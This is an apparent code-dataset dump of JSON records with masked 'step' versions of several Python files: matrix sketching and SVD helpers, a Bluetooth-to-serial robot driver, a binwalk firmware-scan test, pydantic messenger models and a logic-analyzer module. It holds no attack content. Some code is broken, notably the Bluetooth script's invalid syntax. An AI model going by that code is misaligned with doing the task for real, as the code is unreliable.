coefficient * mat\n tf.logging.info('Done sketch_matrix %s %d', sketch_type, k)\n return 1.0 / k * A_hat\n\n\ndef truncated_svd(A, k):\n tf.logging.info('Computing SVD ...')\n u, s, v = np.linalg.svd(A, full_matrices=False)\n u_trunc = u[:, 0:k]\n s_trunc = s[0:k]\n v_trunc = v[0:k, :]\n A_hat = np.dot(u_trunc, np.dot(np.diag(s_trunc), v_trunc))\n tf.logging.info('Done computing SVD ...')\n return A_hat\n\n\ndef compress(A, compression_type, num_params):\n if compression_type == 'svd':\n A_hat = truncated_svd(A, num_params)\n elif compression_type == 'our_sketch' or compression_type == 'arora':\n A_hat = sketch_matrix(A, compression_type, num_params)\n else:\n print(\n 'Error: wrong compression type. Must be svd, our_sketch, or arora.'\n )\n return A_hat\n\n\ndef singular_values(A):\n u, s, v = np.linalg.svd(A)\n sing = sorted(s, reverse=True)\n return sing\n\n\ndef plot_and_save_singular_values(s, folder, fn, nrows, ncols):\n x = range(1, len(s) + 1)\n y = sorted(s, reverse=True)\n title = 'Singular values\\ndim = (' + str(nrows) + 'x' + str(ncols) + ')'\n plt.plot(x, y)\n plt.title(title)\n plt.tight_layout()\n save_fig(folder, fn)\n save_array(np.array(s), folder, fn + '_vals', '%.18e')\n", "step-2": "<mask token>\n\n\ndef make_experiment_dir(postfix):\n home = os.path.expanduser('~')\n exp_dir = os.path.join(home, postfix)\n mkdir_p(exp_dir)\n return exp_dir\n\n\ndef save_fig(folder, filename):\n if folder is None:\n return\n filename_out = os.path.join(folder, filename + '.png')\n print('saving {}'.format(filename_out))\n with open(filename_out, 'w') as out_file:\n plt.savefig(out_file)\n\n\ndef save_array(x, folder, filename, formatting):\n if folder is None:\n return\n filename_out = os.path.join(folder, filename + '.txt')\n print('saving {}'.format(filename_out))\n with open(filename_out, 'w') as out_file:\n np.savetxt(out_file, x, fmt=formatting)\n\n\ndef load_array(filename):\n with open(filename, 'r') as f:\n return np.loadtxt(f)\n\n\ndef count_parameters_list(k_values, nrows, ncols):\n new_list = []\n for k in k_values:\n new_k = count_parameters(k, nrows, ncols)\n new_list.append(new_k)\n return new_list\n\n\ndef count_parameters(rank, nrows, ncols):\n return (nrows + ncols) * rank\n\n\ndef fully_random_rademacher_matrix(nrows, ncols):\n plus_minus_one = np.array([-1, 1], dtype=np.float32)\n return np.random.choice(plus_minus_one, (nrows, ncols))\n\n\n<mask token>\n\n\ndef sketch_matrix(A, sketch_type, k):\n tf.logging.info('sketch_matrix %s %d', sketch_type, k)\n h1 = A.shape[0]\n h2 = A.shape[1]\n A_hat = np.zeros((h1, h2), dtype=np.float32)\n for i in range(0, k):\n tf.logging.log_every_n(tf.logging.INFO,\n 'sketch_matrix %s iter %d/%d', 1000, sketch_type, i, k)\n if sketch_type == 'arora':\n mat = fully_random_rademacher_matrix(h1, h2)\n elif sketch_type == 'our_sketch':\n mat = rank1_rademacher(h1, h2)\n else:\n print('wrong sketch_type variable')\n return -1\n coefficient = np.dot(np.ravel(A), np.ravel(mat))\n A_hat += coefficient * mat\n tf.logging.info('Done sketch_matrix %s %d', sketch_type, k)\n return 1.0 / k * A_hat\n\n\ndef truncated_svd(A, k):\n tf.logging.info('Computing SVD ...')\n u, s, v = np.linalg.svd(A, full_matrices=False)\n u_trunc = u[:, 0:k]\n s_trunc = s[0:k]\n v_trunc = v[0:k, :]\n A_hat = np.dot(u_trunc, np.dot(np.diag(s_trunc), v_trunc))\n tf.logging.info('Done computing SVD ...')\n return A_hat\n\n\ndef compress(A, compression_type, num_params):\n if compression_type == 'svd':\n A_hat = truncated_svd(A, num_params)\n elif compression_type == 'our_sketch' or compression_type == 'arora':\n A_hat = sketch_matrix(A, compression_type, num_params)\n else:\n print(\n 'Error: wrong compression type. Must be svd, our_sketch, or arora.'\n )\n return A_hat\n\n\ndef singular_values(A):\n u, s, v = np.linalg.svd(A)\n sing = sorted(s, reverse=True)\n return sing\n\n\ndef plot_and_save_singular_values(s, folder, fn, nrows, ncols):\n x = range(1, len(s) + 1)\n y = sorted(s, reverse=True)\n title = 'Singular values\\ndim = (' + str(nrows) + 'x' + str(ncols) + ')'\n plt.plot(x, y)\n plt.title(title)\n plt.tight_layout()\n save_fig(folder, fn)\n save_array(np.array(s), folder, fn + '_vals', '%.18e')\n", "step-3": "<mask token>\n\n\ndef make_experiment_dir(postfix):\n home = os.path.expanduser('~')\n exp_dir = os.path.join(home, postfix)\n mkdir_p(exp_dir)\n return exp_dir\n\n\ndef save_fig(folder, filename):\n if folder is None:\n return\n filename_out = os.path.join(folder, filename + '.png')\n print('saving {}'.format(filename_out))\n with open(filename_out, 'w') as out_file:\n plt.savefig(out_file)\n\n\ndef save_array(x, folder, filename, formatting):\n if folder is None:\n return\n filename_out = os.path.join(folder, filename + '.txt')\n print('saving {}'.format(filename_out))\n with open(filename_out, 'w') as out_file:\n np.savetxt(out_file, x, fmt=formatting)\n\n\ndef load_array(filename):\n with open(filename, 'r') as f:\n return np.loadtxt(f)\n\n\ndef count_parameters_list(k_values, nrows, ncols):\n new_list = []\n for k in k_values:\n new_k = count_parameters(k, nrows, ncols)\n new_list.append(new_k)\n return new_list\n\n\ndef count_parameters(rank, nrows, ncols):\n return (nrows + ncols) * rank\n\n\ndef fully_random_rademacher_matrix(nrows, ncols):\n plus_minus_one = np.array([-1, 1], dtype=np.float32)\n return np.random.choice(plus_minus_one, (nrows, ncols))\n\n\ndef rank1_rademacher(nrows, ncols):\n plus_minus_one = np.array([-1, 1], dtype=np.float32)\n column_vector = np.random.choice(plus_minus_one, (nrows, 1))\n row_vector = np.random.choice(plus_minus_one, (1, ncols))\n return column_vector * row_vector\n\n\ndef sketch_matrix(A, sketch_type, k):\n tf.logging.info('sketch_matrix %s %d', sketch_type, k)\n h1 = A.shape[0]\n h2 = A.shape[1]\n A_hat = np.zeros((h1, h2), dtype=np.float32)\n for i in range(0, k):\n tf.logging.log_every_n(tf.logging.INFO,\n 'sketch_matrix %s iter %d/%d', 1000, sketch_type, i, k)\n if sketch_type == 'arora':\n mat = fully_random_rademacher_matrix(h1, h2)\n elif sketch_type == 'our_sketch':\n mat = rank1_rademacher(h1, h2)\n else:\n print('wrong sketch_type variable')\n return -1\n coefficient = np.dot(np.ravel(A), np.ravel(mat))\n A_hat += coefficient * mat\n tf.logging.info('Done sketch_matrix %s %d', sketch_type, k)\n return 1.0 / k * A_hat\n\n\ndef truncated_svd(A, k):\n tf.logging.info('Computing SVD ...')\n u, s, v = np.linalg.svd(A, full_matrices=False)\n u_trunc = u[:, 0:k]\n s_trunc = s[0:k]\n v_trunc = v[0:k, :]\n A_hat = np.dot(u_trunc, np.dot(np.diag(s_trunc), v_trunc))\n tf.logging.info('Done computing SVD ...')\n return A_hat\n\n\ndef compress(A, compression_type, num_params):\n if compression_type == 'svd':\n A_hat = truncated_svd(A, num_params)\n elif compression_type == 'our_sketch' or compression_type == 'arora':\n A_hat = sketch_matrix(A, compression_type, num_params)\n else:\n print(\n 'Error: wrong compression type. Must be svd, our_sketch, or arora.'\n )\n return A_hat\n\n\ndef singular_values(A):\n u, s, v = np.linalg.svd(A)\n sing = sorted(s, reverse=True)\n return sing\n\n\ndef plot_and_save_singular_values(s, folder, fn, nrows, ncols):\n x = range(1, len(s) + 1)\n y = sorted(s, reverse=True)\n title = 'Singular values\\ndim = (' + str(nrows) + 'x' + str(ncols) + ')'\n plt.plot(x, y)\n plt.title(title)\n plt.tight_layout()\n save_fig(folder, fn)\n save_array(np.array(s), folder, fn + '_vals', '%.18e')\n", "step-4": "<mask token>\n\n\ndef mkdir_p(path):\n try:\n os.makedirs(path, mode=493)\n except OSError as exc:\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise\n\n\ndef make_experiment_dir(postfix):\n home = os.path.expanduser('~')\n exp_dir = os.path.join(home, postfix)\n mkdir_p(exp_dir)\n return exp_dir\n\n\ndef save_fig(folder, filename):\n if folder is None:\n return\n filename_out = os.path.join(folder, filename + '.png')\n print('saving {}'.format(filename_out))\n with open(filename_out, 'w') as out_file:\n plt.savefig(out_file)\n\n\ndef save_array(x, folder, filename, formatting):\n if folder is None:\n return\n filename_out = os.path.join(folder, filename + '.txt')\n print('saving {}'.format(filename_out))\n with open(filename_out, 'w') as out_file:\n np.savetxt(out_file, x, fmt=formatting)\n\n\ndef load_array(filename):\n with open(filename, 'r') as f:\n return np.loadtxt(f)\n\n\ndef count_parameters_list(k_values, nrows, ncols):\n new_list = []\n for k in k_values:\n new_k = count_parameters(k, nrows, ncols)\n new_list.append(new_k)\n return new_list\n\n\ndef count_parameters(rank, nrows, ncols):\n return (nrows + ncols) * rank\n\n\ndef fully_random_rademacher_matrix(nrows, ncols):\n plus_minus_one = np.array([-1, 1], dtype=np.float32)\n return np.random.choice(plus_minus_one, (nrows, ncols))\n\n\ndef rank1_rademacher(nrows, ncols):\n plus_minus_one = np.array([-1, 1], dtype=np.float32)\n column_vector = np.random.choice(plus_minus_one, (nrows, 1))\n row_vector = np.random.choice(plus_minus_one, (1, ncols))\n return column_vector * row_vector\n\n\ndef sketch_matrix(A, sketch_type, k):\n tf.logging.info('sketch_matrix %s %d', sketch_type, k)\n h1 = A.shape[0]\n h2 = A.shape[1]\n A_hat = np.zeros((h1, h2), dtype=np.float32)\n for i in range(0, k):\n tf.logging.log_every_n(tf.logging.INFO,\n 'sketch_matrix %s iter %d/%d', 1000, sketch_type, i, k)\n if sketch_type == 'arora':\n mat = fully_random_rademacher_matrix(h1, h2)\n elif sketch_type == 'our_sketch':\n mat = rank1_rademacher(h1, h2)\n else:\n print('wrong sketch_type variable')\n return -1\n coefficient = np.dot(np.ravel(A), np.ravel(mat))\n A_hat += coefficient * mat\n tf.logging.info('Done sketch_matrix %s %d', sketch_type, k)\n return 1.0 / k * A_hat\n\n\ndef truncated_svd(A, k):\n tf.logging.info('Computing SVD ...')\n u, s, v = np.linalg.svd(A, full_matrices=False)\n u_trunc = u[:, 0:k]\n s_trunc = s[0:k]\n v_trunc = v[0:k, :]\n A_hat = np.dot(u_trunc, np.dot(np.diag(s_trunc), v_trunc))\n tf.logging.info('Done computing SVD ...')\n return A_hat\n\n\ndef compress(A, compression_type, num_params):\n if compression_type == 'svd':\n A_hat = truncated_svd(A, num_params)\n elif compression_type == 'our_sketch' or compression_type == 'arora':\n A_hat = sketch_matrix(A, compression_type, num_params)\n else:\n print(\n 'Error: wrong compression type. Must be svd, our_sketch, or arora.'\n )\n return A_hat\n\n\ndef singular_values(A):\n u, s, v = np.linalg.svd(A)\n sing = sorted(s, reverse=True)\n return sing\n\n\ndef plot_and_save_singular_values(s, folder, fn, nrows, ncols):\n x = range(1, len(s) + 1)\n y = sorted(s, reverse=True)\n title = 'Singular values\\ndim = (' + str(nrows) + 'x' + str(ncols) + ')'\n plt.plot(x, y)\n plt.title(title)\n plt.tight_layout()\n save_fig(folder, fn)\n save_array(np.array(s), folder, fn + '_vals', '%.18e')\n", "step-5": "# coding=utf-8\n# Copyright 2019 The Google Research Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\" Common methods shared by MNIST and ImageNet experiments.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport errno\nimport getpass\n\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\n\n# mkdir -p in Python >2.5\ndef mkdir_p(path):\n try:\n os.makedirs(path, mode=0o755)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise\n\n\n# Returns path to postfix under user's Unix home directory.\ndef make_experiment_dir(postfix):\n home = os.path.expanduser('~')\n exp_dir = os.path.join(home, postfix)\n mkdir_p(exp_dir)\n return exp_dir\n\n\n# appends .png to file name\ndef save_fig(folder, filename):\n if folder is None:\n return\n filename_out = os.path.join(folder, filename + '.png')\n print('saving {}'.format(filename_out))\n with open(filename_out, 'w') as out_file:\n plt.savefig(out_file)\n\n\n# appends .txt to file name\ndef save_array(x, folder, filename, formatting):\n if folder is None:\n return\n filename_out = os.path.join(folder, filename + '.txt')\n print('saving {}'.format(filename_out))\n with open(filename_out, 'w') as out_file:\n np.savetxt(out_file, x, fmt=formatting)\n\n\ndef load_array(filename):\n with open(filename, 'r') as f:\n return np.loadtxt(f)\n\n\n# count parameters for svd truncation\ndef count_parameters_list(k_values, nrows, ncols):\n new_list = []\n for k in k_values:\n new_k = count_parameters(k, nrows, ncols)\n new_list.append(new_k)\n return new_list\n\n\n# number of parameters when nrows-by-ncols matrix is approximated\n# with product of nrows-by-rank and rank-by-ncolds matrix.\ndef count_parameters(rank, nrows, ncols):\n return (nrows + ncols) * rank\n\n\n# Return one random rademacher matrix\ndef fully_random_rademacher_matrix(nrows, ncols):\n plus_minus_one = np.array([-1, 1], dtype=np.float32)\n return np.random.choice(plus_minus_one, (nrows, ncols))\n\n\n# Return a rank-1 Rademacher matrix\ndef rank1_rademacher(nrows, ncols):\n plus_minus_one = np.array([-1, 1], dtype=np.float32)\n column_vector = np.random.choice(plus_minus_one, (nrows, 1))\n row_vector = np.random.choice(plus_minus_one, (1, ncols))\n # Plain * is quicker than equivalent np.dot(column_vector, row_vector)\n return column_vector * row_vector\n\n# Sketch matrix A\ndef sketch_matrix(A, sketch_type, k):\n tf.logging.info('sketch_matrix %s %d', sketch_type, k)\n h1 = A.shape[0]\n h2 = A.shape[1]\n # Numpy defaults to int64 or float64 (double precision).\n # Computing with float32 (single precision) is quicker.\n A_hat = np.zeros((h1, h2), dtype=np.float32)\n for i in range(0, k):\n tf.logging.log_every_n(tf.logging.INFO, 'sketch_matrix %s iter %d/%d', 1000,\n sketch_type, i, k)\n # generate random matrix\n if sketch_type == 'arora':\n mat = fully_random_rademacher_matrix(h1, h2)\n elif sketch_type == 'our_sketch':\n mat = rank1_rademacher(h1, h2)\n else:\n print('wrong sketch_type variable')\n return -1\n # get coefficient\n coefficient = np.dot(np.ravel(A), np.ravel(mat))\n # add coefficient*matrix to A_hat\n A_hat += coefficient * mat\n tf.logging.info('Done sketch_matrix %s %d', sketch_type, k)\n return (1.0 / k) * A_hat\n\n\n# Return truncated svd of A, where only the top k components are used.\n# Adding --copt=-mavx --copt=-mavx2 --copt=-mfma compiler flags\n# speeds up svd by almost 2x. However it makes sketching, which is dominant,\n# a tiny bit slower and hence it's not worth it.\ndef truncated_svd(A, k):\n tf.logging.info('Computing SVD ...')\n u, s, v = np.linalg.svd(A, full_matrices=False)\n u_trunc = u[:, 0:k]\n s_trunc = s[0:k]\n v_trunc = v[0:k, :]\n A_hat = np.dot(u_trunc, np.dot(np.diag(s_trunc), v_trunc))\n tf.logging.info('Done computing SVD ...')\n return A_hat\n\n# num_params is rank for SVD, number of coefficients for sketches.\ndef compress(A, compression_type, num_params):\n if compression_type == 'svd':\n A_hat = truncated_svd(A, num_params)\n elif compression_type == 'our_sketch' or compression_type == 'arora':\n A_hat = sketch_matrix(A, compression_type, num_params)\n else:\n print('Error: wrong compression type. Must be svd, our_sketch, or arora.')\n return A_hat\n\n\n# return singular values of A sorted in descending order\ndef singular_values(A):\n u, s, v = np.linalg.svd(A)\n sing = sorted(s, reverse=True)\n return sing\n\ndef plot_and_save_singular_values(s, folder, fn, nrows, ncols):\n x = range(1, len(s) + 1)\n y = sorted(s, reverse=True)\n title = 'Singular values\\ndim = (' + str(nrows) + 'x' + str(ncols) + ')'\n plt.plot(x, y)\n plt.title(title)\n plt.tight_layout()\n save_fig(folder, fn)\n save_array(np.array(s), folder, fn + '_vals', '%.18e')\n", "step-ids": [ 10, 12, 13, 14, 16 ] }
[ 10, 12, 13, 14, 16 ]
import bluetooth import serial import struct # Definition of Bluetooth rfcomm socket bd_addr = "98:D3:37:00:8D:39" # The address from the HC-05 sensor port = 1 sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM) sock.connect((bd_addr,port)) # Definition of Serial port ser = serial.Serial("/dev/ttyACM0", 57600) def BT_DRIVING(): while True: data = ord(sock.recv(1024)) String = ' ' String = struct.pack('!B',data) ser.write(string) def BT_SIGNAL(): while True: data = ord(sock.recv(1024)) String = ' ' String = struct.pack('!B', data) if String == 24: return 24 elif String = 25: return 25: def FR30(): string = 10 string = struct.pack('!B',string) ser.write(string) def FR15(): string = 11 string = struct.pack('!B',string) ser.write(string) def FS00(): string = 12 string = struct.pack('!B',string) ser.write(string) def FL15(): string = 13 string = struct.pack('!B',string) ser.write(string) def FL30(): string = 14 string = struct.pack('!B',string) ser.write(string) def HR30(): string = 15 string = struct.pack('!B',string) ser.write(string) def HR15(): string = 16 string = struct.pack('!B',string) ser.write(string) def HS00(): string = 17 string = struct.pack('!B',string) ser.write(string) def HL15(): string = 18 string = struct.pack('!B',string) ser.write(string) def HL30(): string = 19 string = struct.pack('!B',string) ser.write(string) def BR30(): string = 20 string = struct.pack('!B',string) ser.write(string) def BR15(): string = 21 string = struct.pack('!B',string) ser.write(string) def BS00(): string = 22 string = struct.pack('!B',string) ser.write(string) def BL15(): string = 23 string = struct.pack('!B',string) ser.write(string) def BL30(): string = 24 string = struct.pack('!B',string) ser.write(string)
normal
{ "blob_id": "605c78795b5a072d330d44a150f26ad410d9d084", "index": 2962, "step-1": "import bluetooth\nimport serial\nimport struct\n\n# Definition of Bluetooth rfcomm socket\nbd_addr = \"98:D3:37:00:8D:39\" # The address from the HC-05 sensor\nport = 1\nsock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)\nsock.connect((bd_addr,port))\n\n# Definition of Serial port\nser = serial.Serial(\"/dev/ttyACM0\", 57600)\n\ndef BT_DRIVING():\n while True:\n data = ord(sock.recv(1024))\n String = ' '\n String = struct.pack('!B',data)\n ser.write(string)\n\ndef BT_SIGNAL():\n while True:\n data = ord(sock.recv(1024))\n String = ' '\n String = struct.pack('!B', data)\n if String == 24:\n return 24\n elif String = 25:\n return 25:\n\ndef FR30():\n string = 10\n string = struct.pack('!B',string)\n ser.write(string)\ndef FR15():\n string = 11\n string = struct.pack('!B',string)\n ser.write(string)\ndef FS00():\n string = 12\n string = struct.pack('!B',string)\n ser.write(string)\ndef FL15():\n string = 13\n string = struct.pack('!B',string)\n ser.write(string)\ndef FL30():\n string = 14\n string = struct.pack('!B',string)\n ser.write(string)\n\n\ndef HR30():\n string = 15\n string = struct.pack('!B',string)\n ser.write(string)\ndef HR15():\n string = 16\n string = struct.pack('!B',string)\n ser.write(string)\ndef HS00():\n string = 17\n string = struct.pack('!B',string)\n ser.write(string)\ndef HL15():\n string = 18\n string = struct.pack('!B',string)\n ser.write(string)\ndef HL30():\n string = 19\n string = struct.pack('!B',string)\n ser.write(string)\n\n\ndef BR30():\n string = 20\n string = struct.pack('!B',string)\n ser.write(string)\ndef BR15():\n string = 21\n string = struct.pack('!B',string)\n ser.write(string)\ndef BS00():\n string = 22\n string = struct.pack('!B',string)\n ser.write(string)\ndef BL15():\n string = 23\n string = struct.pack('!B',string)\n ser.write(string)\ndef BL30():\n string = 24\n string = struct.pack('!B',string)\n ser.write(string)\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
from os.path import dirname import binwalk from nose.tools import eq_, ok_ def test_firmware_squashfs(): ''' Test: Open hello-world.srec, scan for signatures verify that only one signature is returned verify that the only signature returned is Motorola S-rec data-signature ''' expected_results = [ [0, 'DLOB firmware header, boot partition: "dev=/dev/mtdblock/2"'], [112, 'LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3466208 bytes'], [1179760, 'PackImg section delimiter tag, little endian size: 11548416 bytes; big endian size: 3649536 bytes'], [1179792, 'Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 3647665 bytes, 1811 inodes, blocksize: 524288 bytes, created: 2013-09-17 06:43:22'], ] scan_result = binwalk.scan( dirname(__file__) + '/input-vectors/firmware.squashfs', signature=True, quiet=True, extract=True) # Throws a warning for missing external extractor # Test number of modules used eq_(len(scan_result), 1) # Test number of results for that module eq_(len(scan_result[0].results), len(expected_results)) # Test result-description for i in range(0, len(scan_result[0].results)): eq_(scan_result[0].results[i].offset, expected_results[i][0]) eq_(scan_result[0].results[i].description, expected_results[i][1])
normal
{ "blob_id": "d55043c2a18b935478d9be442aaf7305231edc7d", "index": 5828, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef test_firmware_squashfs():\n \"\"\"\n Test: Open hello-world.srec, scan for signatures\n verify that only one signature is returned\n verify that the only signature returned is Motorola S-rec data-signature\n \"\"\"\n expected_results = [[0,\n 'DLOB firmware header, boot partition: \"dev=/dev/mtdblock/2\"'], [\n 112,\n 'LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3466208 bytes'\n ], [1179760,\n 'PackImg section delimiter tag, little endian size: 11548416 bytes; big endian size: 3649536 bytes'\n ], [1179792,\n 'Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 3647665 bytes, 1811 inodes, blocksize: 524288 bytes, created: 2013-09-17 06:43:22'\n ]]\n scan_result = binwalk.scan(dirname(__file__) +\n '/input-vectors/firmware.squashfs', signature=True, quiet=True,\n extract=True)\n eq_(len(scan_result), 1)\n eq_(len(scan_result[0].results), len(expected_results))\n for i in range(0, len(scan_result[0].results)):\n eq_(scan_result[0].results[i].offset, expected_results[i][0])\n eq_(scan_result[0].results[i].description, expected_results[i][1])\n", "step-3": "from os.path import dirname\nimport binwalk\nfrom nose.tools import eq_, ok_\n\n\ndef test_firmware_squashfs():\n \"\"\"\n Test: Open hello-world.srec, scan for signatures\n verify that only one signature is returned\n verify that the only signature returned is Motorola S-rec data-signature\n \"\"\"\n expected_results = [[0,\n 'DLOB firmware header, boot partition: \"dev=/dev/mtdblock/2\"'], [\n 112,\n 'LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3466208 bytes'\n ], [1179760,\n 'PackImg section delimiter tag, little endian size: 11548416 bytes; big endian size: 3649536 bytes'\n ], [1179792,\n 'Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 3647665 bytes, 1811 inodes, blocksize: 524288 bytes, created: 2013-09-17 06:43:22'\n ]]\n scan_result = binwalk.scan(dirname(__file__) +\n '/input-vectors/firmware.squashfs', signature=True, quiet=True,\n extract=True)\n eq_(len(scan_result), 1)\n eq_(len(scan_result[0].results), len(expected_results))\n for i in range(0, len(scan_result[0].results)):\n eq_(scan_result[0].results[i].offset, expected_results[i][0])\n eq_(scan_result[0].results[i].description, expected_results[i][1])\n", "step-4": "from os.path import dirname\n\nimport binwalk\nfrom nose.tools import eq_, ok_\n\n\ndef test_firmware_squashfs():\n '''\n Test: Open hello-world.srec, scan for signatures\n verify that only one signature is returned\n verify that the only signature returned is Motorola S-rec data-signature\n '''\n expected_results = [\n [0, 'DLOB firmware header, boot partition: \"dev=/dev/mtdblock/2\"'],\n [112, 'LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3466208 bytes'],\n [1179760, 'PackImg section delimiter tag, little endian size: 11548416 bytes; big endian size: 3649536 bytes'],\n [1179792, 'Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 3647665 bytes, 1811 inodes, blocksize: 524288 bytes, created: 2013-09-17 06:43:22'],\n ]\n\n scan_result = binwalk.scan(\n dirname(__file__) + '/input-vectors/firmware.squashfs',\n signature=True,\n quiet=True,\n extract=True) # Throws a warning for missing external extractor\n # Test number of modules used\n eq_(len(scan_result), 1)\n # Test number of results for that module\n eq_(len(scan_result[0].results), len(expected_results))\n # Test result-description\n for i in range(0, len(scan_result[0].results)):\n eq_(scan_result[0].results[i].offset, expected_results[i][0])\n eq_(scan_result[0].results[i].description, expected_results[i][1])\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
import typing from pydantic import AnyUrl from .base import FBObject class MediaPayload(FBObject): url: AnyUrl class Coors(FBObject): lat: float long: float class LocationPayload(FBObject): coordinates: Coors class AttachmentFallback(FBObject): title: str url: AnyUrl payload: typing.Any = None type: str = 'fallback' class Attachment(FBObject): type: str # template, audio, fallback, file, image, location or video payload: typing.Union[MediaPayload, Coors, None]
normal
{ "blob_id": "1f6176e9285d810934ae745cf8759b5cd6f408c8", "index": 8767, "step-1": "<mask token>\n\n\nclass LocationPayload(FBObject):\n coordinates: Coors\n\n\nclass AttachmentFallback(FBObject):\n title: str\n url: AnyUrl\n payload: typing.Any = None\n type: str = 'fallback'\n\n\nclass Attachment(FBObject):\n type: str\n payload: typing.Union[MediaPayload, Coors, None]\n", "step-2": "<mask token>\n\n\nclass Coors(FBObject):\n lat: float\n long: float\n\n\nclass LocationPayload(FBObject):\n coordinates: Coors\n\n\nclass AttachmentFallback(FBObject):\n title: str\n url: AnyUrl\n payload: typing.Any = None\n type: str = 'fallback'\n\n\nclass Attachment(FBObject):\n type: str\n payload: typing.Union[MediaPayload, Coors, None]\n", "step-3": "<mask token>\n\n\nclass MediaPayload(FBObject):\n url: AnyUrl\n\n\nclass Coors(FBObject):\n lat: float\n long: float\n\n\nclass LocationPayload(FBObject):\n coordinates: Coors\n\n\nclass AttachmentFallback(FBObject):\n title: str\n url: AnyUrl\n payload: typing.Any = None\n type: str = 'fallback'\n\n\nclass Attachment(FBObject):\n type: str\n payload: typing.Union[MediaPayload, Coors, None]\n", "step-4": "import typing\nfrom pydantic import AnyUrl\nfrom .base import FBObject\n\n\nclass MediaPayload(FBObject):\n url: AnyUrl\n\n\nclass Coors(FBObject):\n lat: float\n long: float\n\n\nclass LocationPayload(FBObject):\n coordinates: Coors\n\n\nclass AttachmentFallback(FBObject):\n title: str\n url: AnyUrl\n payload: typing.Any = None\n type: str = 'fallback'\n\n\nclass Attachment(FBObject):\n type: str\n payload: typing.Union[MediaPayload, Coors, None]\n", "step-5": "import typing\n\nfrom pydantic import AnyUrl\n\nfrom .base import FBObject\n\n\nclass MediaPayload(FBObject):\n url: AnyUrl\n\n\nclass Coors(FBObject):\n lat: float\n long: float\n\n\nclass LocationPayload(FBObject):\n coordinates: Coors\n\n\nclass AttachmentFallback(FBObject):\n title: str\n url: AnyUrl\n payload: typing.Any = None\n type: str = 'fallback'\n\n\nclass Attachment(FBObject):\n type: str # template, audio, fallback, file, image, location or video\n payload: typing.Union[MediaPayload, Coors, None]\n", "step-ids": [ 3, 4, 5, 6, 7 ] }
[ 3, 4, 5, 6, 7 ]
""" This file contains the general data storage classes used throughout Logician. """ import csv import json import os from collections import OrderedDict VALID_CHANNEL_COUNTS = [4] class Acquisition: """ The acqusition object contains data from all of the acquired channels. Parameters ---------- data : array or bytes or str Array of form [[1, 0, 0, ...], [0, 0, 1, ...], ...] or bytes of data. If data is bytes, channel_count must be provided. samplerate : int The acquisition rate in Samples / sec. """ def __init__(self, data, sample_rate=1, channel_count=None): if isinstance(data, list): if len(data) not in VALID_CHANNEL_COUNTS: raise ValueError('data must have length %s' % str(VALID_CHANNEL_COUNTS)) l = len(data[0]) for channel in data: if len(channel) != l: raise ValueError('All channels must be have same length.') self.data = data elif isinstance(data, bytes): if channel_count not in VALID_CHANNEL_COUNTS: raise ValueError('Invalid number of channels.') # Convert byte string to list of 1's and 0's. If there are 4 # channels each byte should have 2 4 channel samples in it. The MSB # is the 4th channel of the least recent sample. sep_channel_data = [f(c) for c in data for f in (lambda x: ord(x) >> 4, lambda x: ord(x) & 0x0F)] unpacked_data = [[int(i) for i in list(bin(d)[2:].zfill(4))] for d in sep_channel_data] self.data = list(zip(*unpacked_data)) self.data.reverse() elif isinstance(data, str): self.load_csv_file(data) return else: raise TypeError('Invalid data type') self.sample_rate = sample_rate @property def dt(self): return 1.0 / self.sample_rate @property def acquisition_length(self): return len(self.data[0]) @property def channel_count(self): return len(self.data) def csv_string(self): out_string = '#sample_rate=%d' % self.sample_rate for row in zip(*self.data): out_string += str(row)[1:-1].replace(' ', '') out_string += '\n' return out_string def load_csv_file(self, fname): with open(fname) as f: reader = csv.reader(f) header = next(reader) sample_rate = int(header[0].split('=')[-1]) data = [[int(d) for d in row] for row in reader if len(row) != 1] self.data = list(zip(*data)) self.sample_rate = sample_rate def __len__(self): return len(self.data) def __getitem__(self, key): return self.data[key] def __iter__(self): return iter(self.data) class AnalyzerCommand: """ Simple class to hold analyzer commands and create appropriate command bytes to be sent to the firmware. """ sample_counts = OrderedDict((('200K', 200000), ('100K', 100000), ('50K', 50000), ('10K', 10000), ('2K', 2000))) sample_rates = OrderedDict((('1 MS/s', 1000000), ('500 KS/s', 500000), ('200 KS/s', 200000), ('100 KS/s', 10000))) def __init__(self, sample_rate=1e6, sample_count=64000, trigger_type=0, trigger_channel=0): sp = int(1.0 / sample_rate / 1e-6) self.sample_count = sample_count self.sample_rate = sample_rate sample_count /= 1000 self.command_bytes = \ [0x01, # Command (sp & 0x00FF), (sp >> 8), # Sample Period (us) (sample_count & 0x00FF), (sample_count >> 8), trigger_type, trigger_channel] self.command_bytes = (''.join([chr(x) for x in self.command_bytes]) + ' '*(64 - len(self.command_bytes))) class ThemeManager: """ A class to manage and load themes for the signal display. """ def __init__(self, theme_dir): self.theme_dir = theme_dir self.refresh() def refresh(self): self.themes = [] for fname in os.listdir(self.theme_dir): if fname.endswith('.json'): try: j = json.loads( open(os.path.join(self.theme_dir, fname)).read()) self.themes.append(j) except: continue def theme_names(self): """ Returns the names for each theme. """ return [theme.get('name', 'Error') 